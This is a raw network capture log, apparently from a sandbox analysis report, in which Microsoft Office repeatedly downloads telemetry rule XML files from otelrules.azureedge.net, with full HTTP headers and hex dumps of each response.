                                                                                                                                                                                                                                                                                      2024-11-20 09:54:33 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      126192.168.2.64986113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:33 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1403
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                                                                                                      x-ms-request-id: bfe6e8fa-201e-006e-3f8c-3abbe3000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095432Z-r1d97b995778dpcthC1TEB4b5400000008gg00000000bras
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:33 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      127192.168.2.64986013.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:32 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:33 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:32 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1366
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                                                                                                      x-ms-request-id: b82dd3a8-b01e-0053-0e8c-3acdf8000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095432Z-185f5d8b95c68cvnhC1NYCfn7s0000000a0000000000c7vg
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:33 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      128192.168.2.64986213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:33 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:33 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:33 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1399
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 85bacdce-f01e-003f-758c-3ad19d000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095433Z-r1d97b99577n5jhbhC1TEB74vn00000008hg00000000eyd1
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:33 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      129192.168.2.64986313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:33 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:33 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:33 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1362
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 270c2d5d-601e-00ab-2f8c-3a66f4000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095433Z-1777c6cb754rz2pghC1TEBghen000000099000000000butu
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:33 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      130192.168.2.64986613.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:34 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:34 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:34 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1388
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 073925de-a01e-0032-2d8c-3a1949000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095434Z-185f5d8b95csd4bwhC1NYCq7dc00000009xg00000000ckhp
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:34 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      131192.168.2.64986713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:34 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:34 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:34 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1425
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 5a5a1706-c01e-0079-6c8c-3ae51a000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095434Z-1777c6cb7544n7p6hC1TEByvb400000009e000000000ghwt
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:34 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      132192.168.2.64987213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:34 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:35 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1415
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                                                                                                      x-ms-request-id: d5dea27c-d01e-00ad-3c8c-3ae942000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095435Z-185f5d8b95c4vwv8hC1NYCy4v40000000a3000000000faf7
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:35 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      133192.168.2.64987713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:34 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:35 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1405
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 9bd4509d-401e-005b-16fa-3a9c0c000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095435Z-r1d97b99577656nchC1TEBk98c00000008pg00000000c3q4
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:35 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      134192.168.2.64987613.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:34 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:35 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:35 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 1378
                                                                                                                                                                                                                                                                                      Connection: close
